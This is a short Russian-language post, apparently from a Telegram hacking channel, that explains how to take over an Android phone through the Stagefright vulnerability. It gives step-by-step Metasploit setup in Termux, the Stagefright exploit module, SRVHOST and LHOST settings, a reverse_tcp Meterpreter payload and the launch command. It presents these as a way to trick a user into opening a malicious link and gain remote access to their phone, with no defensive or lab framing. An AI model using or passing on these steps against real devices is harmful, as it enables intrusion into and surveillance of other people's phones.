Взлом Android через ссылку

Обнаружили ряд серьезных уязвимостей в одном из компонентов ядра мобильной ОС Android под названием Stagefright.

Для реализации атаки нам будет достаточно убедить пользователя перейти по вредоносной ссылке, чтобы получить удаленный доступ к Android.

Устанавливаем Metasploit Framework

Обновляем пакеты с помощью команды:

sudo pkg update && sudo pkg upgrade

Далее устанавливаем все необходимые библиотеки:

pkg install unstable-repo 

pkg install x11-repo

И устанавливаем Metasploit:

pkg install metasploit

Ожидаем окончание процесса установки.

Эксплуатируем Stagefright

Открываем Metasploit с помощью команды:

msfconsole

Далее задействуем эксплойт для эксплуатации уязвимости:

exploit/android/browser/stagefright_mp4_tx3g_64bit

Выставляем значение нашего IP-адреса:

set SRVHOST <ip-адрес>

set LHOST <ip-адрес>

Теперь прописываем следующие параметры:

set URIPATH / 

set PAYLOAD linux/armle/mettle/reverse_tcp

set VERBOSE true

Запускаем эксплойт:

exploit -j

В открывшемся окне появится вредоносная ссылка, по которой должен перейти пользователь. Если пользователь перейдет по ней, то в нашем терминале откроется сессия для удаленного доступа.

⚡️ Канал - ссылка

📺 YouTube - ссылка